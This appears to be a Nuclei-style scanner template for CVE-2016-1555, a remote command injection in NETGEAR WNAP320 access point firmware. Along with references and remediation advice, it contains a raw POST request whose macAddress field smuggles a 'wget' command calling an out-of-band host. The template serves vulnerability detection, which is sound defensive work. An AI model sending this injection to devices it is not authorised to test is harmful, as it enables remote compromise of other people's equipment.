Description
NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
id: CVE-2016-1555
info:
name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection
author: gy741
severity: critical
description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
remediation: |
Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
reference:
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2016-1555
- https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic
- http://seclists.org/fulldisclosure/2016/Feb/112
- http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-1555
cwe-id: CWE-77
epss-score: 0.98325
epss-percentile: 0.99914
cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: netgear
product: wnap320_firmware
tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev,vkev,vuln
http:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4b0a0048304602210093417275d7198e9d46dfcab25d4c828083ab98e434516f2d5de68a81ec7a1af4022100fec10449cf2c138ec5b99996cc32f0335f56cb67581376cdb7ee0ee99cd729bc:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.